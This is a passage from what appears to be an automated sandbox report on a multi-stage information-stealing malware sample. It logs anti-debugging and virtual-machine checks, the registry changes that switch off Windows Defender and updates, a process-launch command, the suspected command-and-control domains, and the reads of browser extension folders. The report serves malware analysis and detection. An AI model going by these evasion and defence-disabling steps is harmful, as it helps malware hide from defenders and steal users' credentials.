Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe TID: 5108 Thread sleep time: -36018s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe TID: 5612 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe TID: 6596 Thread sleep time: -34017s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe TID: 3752 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe TID: 4924 Thread sleep time: -36018s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe TID: 6436 Thread sleep count: 44 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe TID: 6436 Thread sleep time: -88044s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe TID: 1284 Thread sleep count: 45 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe TID: 1284 Thread sleep time: -90045s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe TID: 6572 Thread sleep time: -36000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe TID: 1172 Thread sleep count: 49 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe TID: 1172 Thread sleep time: -98049s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe TID: 5440 Thread sleep count: 50 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe TID: 5440 Thread sleep time: -100050s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe TID: 3320 Thread sleep count: 55 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe TID: 3320 Thread sleep time: -110055s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe TID: 660 Thread sleep count: 49 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe TID: 660 Thread sleep time: -98049s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Documents\BFCGDAAKFH.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CB7EBF0 PR_GetNumberOfProcessors,GetSystemInfo, 6_2_6CB7EBF0
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: FBFHJJJD.6.dr Binary or memory string: dev.azure.comVMware20,11696497155j
Source: 5TWLADXGMSKDNXXRW4MQ8.exe, 5TWLADXGMSKDNXXRW4MQ8.exe, 00000003.00000002.1953030119.0000000000897000.00000040.00000001.01000000.00000006.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2483003261.0000000001003000.00000040.00000001.01000000.00000009.sdmp, BFCGDAAKFH.exe, 00000012.00000002.2519523311.000000000029B000.00000040.00000001.01000000.0000000F.sdmp, BFCGDAAKFH.exe, 00000012.00000001.2463804408.000000000029B000.00000080.00000001.01000000.0000000F.sdmp, skotes.exe, 00000014.00000002.2563502915.000000000103B000.00000040.00000001.01000000.00000011.sdmp, skotes.exe, 00000015.00000002.2564409370.000000000103B000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: FBFHJJJD.6.dr Binary or memory string: global block list test formVMware20,11696497155
Source: FBFHJJJD.6.dr Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: FBFHJJJD.6.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: BFCGDAAKFH.exe, 00000012.00000003.2491006025.00000000011DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ElmEHL9kP9.exe, ElmEHL9kP9.exe, 00000000.00000003.1553639592.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1575470027.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1672988235.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1672046563.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1735852218.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1644788411.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1798220616.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1797950764.0000000001098000.00000004.00000020.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.00000000013A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: FBFHJJJD.6.dr Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: FBFHJJJD.6.dr Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: FBFHJJJD.6.dr Binary or memory string: tasks.office.comVMware20,11696497155o
Source: FBFHJJJD.6.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: FBFHJJJD.6.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: FBFHJJJD.6.dr Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: FBFHJJJD.6.dr Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: FBFHJJJD.6.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: FBFHJJJD.6.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: FBFHJJJD.6.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: FBFHJJJD.6.dr Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: FBFHJJJD.6.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: FBFHJJJD.6.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: ElmEHL9kP9.exe, 00000000.00000003.1553639592.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1575470027.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1672988235.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1672046563.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1735852218.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1644788411.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1798220616.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1797950764.0000000001098000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnY-
Source: ElmEHL9kP9.exe, 00000000.00000003.1598404651.0000000005874000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696497155p
Source: FBFHJJJD.6.dr Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.0000000001374000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWXx:
Source: BFCGDAAKFH.exe, 00000012.00000002.2521235453.00000000011BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\e;
Source: FBFHJJJD.6.dr Binary or memory string: AMC password management pageVMware20,11696497155
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.00000000013A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:r
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.00000000013A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWS
Source: FBFHJJJD.6.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: FBFHJJJD.6.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: FBFHJJJD.6.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: FBFHJJJD.6.dr Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.000000000132E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: FBFHJJJD.6.dr Binary or memory string: discord.comVMware20,11696497155f
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.000000000132E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware88
Source: FBFHJJJD.6.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: FBFHJJJD.6.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: FBFHJJJD.6.dr Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: FBFHJJJD.6.dr Binary or memory string: outlook.office.comVMware20,11696497155s
Source: 5TWLADXGMSKDNXXRW4MQ8.exe, 00000003.00000002.1953030119.0000000000897000.00000040.00000001.01000000.00000006.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2483003261.0000000001003000.00000040.00000001.01000000.00000009.sdmp, BFCGDAAKFH.exe, 00000012.00000002.2519523311.000000000029B000.00000040.00000001.01000000.0000000F.sdmp, BFCGDAAKFH.exe, 00000012.00000001.2463804408.000000000029B000.00000080.00000001.01000000.0000000F.sdmp, skotes.exe, 00000014.00000002.2563502915.000000000103B000.00000040.00000001.01000000.00000011.sdmp, skotes.exe, 00000015.00000002.2564409370.000000000103B000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: FBFHJJJD.6.dr Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: FBFHJJJD.6.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: FBFHJJJD.6.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Process queried: DebugPort
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Process queried: DebugPort
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Code function: 3_2_0088C4EB rdtsc 3_2_0088C4EB
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Code function: 3_2_008A250D LdrInitializeThunk, 3_2_008A250D
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CC4AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6CC4AC62
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CC4AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6CC4AC62
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe PID: 1016, type: MEMORYSTR
Source: ElmEHL9kP9.exe, 00000000.00000003.1530456720.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: bashfulacid.lat
Source: ElmEHL9kP9.exe, 00000000.00000003.1530456720.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: tentabatte.lat
Source: ElmEHL9kP9.exe, 00000000.00000003.1530456720.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: curverpluch.lat
Source: ElmEHL9kP9.exe, 00000000.00000003.1530456720.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: talkynicer.lat
Source: ElmEHL9kP9.exe, 00000000.00000003.1530456720.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: shapestickyr.lat
Source: ElmEHL9kP9.exe, 00000000.00000003.1530456720.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: manyrestro.lat
Source: ElmEHL9kP9.exe, 00000000.00000003.1530456720.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: slipperyloo.lat
Source: ElmEHL9kP9.exe, 00000000.00000003.1530456720.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: wordyfindy.lat
Source: ElmEHL9kP9.exe, 00000000.00000003.1530456720.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: observerfry.lat
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\BFCGDAAKFH.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\BFCGDAAKFH.exe "C:\Users\user\Documents\BFCGDAAKFH.exe"
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CC94760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 6_2_6CC94760
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CB71C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 6_2_6CB71C30
Source: 5TWLADXGMSKDNXXRW4MQ8.exe, 00000003.00000002.1953311674.00000000008E9000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: B|/Program Manager
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2483286748.0000000001049000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: Program Manager
Source: BFCGDAAKFH.exe, 00000012.00000002.2519834359.00000000002E2000.00000040.00000001.01000000.0000000F.sdmp, skotes.exe, 00000014.00000002.2563942588.0000000001082000.00000040.00000001.01000000.00000011.sdmp, skotes.exe, 00000015.00000002.2564849334.0000000001082000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Program Manager
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CC4AE71 cpuid 6_2_6CC4AE71
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CC4A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_6CC4A8DC
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CB98390 NSS_GetVersion, 6_2_6CB98390
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Registry value created: TamperProtection 0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
Source: ElmEHL9kP9.exe, ElmEHL9kP9.exe, 00000000.00000003.1672966511.000000000110A000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1672988235.0000000001063000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1672988235.0000000001098000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 21.2.skotes.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.BFCGDAAKFH.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.skotes.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2562867603.0000000000E51000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2518974568.00000000000B1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2563505250.0000000000E51000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ElmEHL9kP9.exe PID: 6272, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.2484458829.000000000132E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2481882187.0000000000C21000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
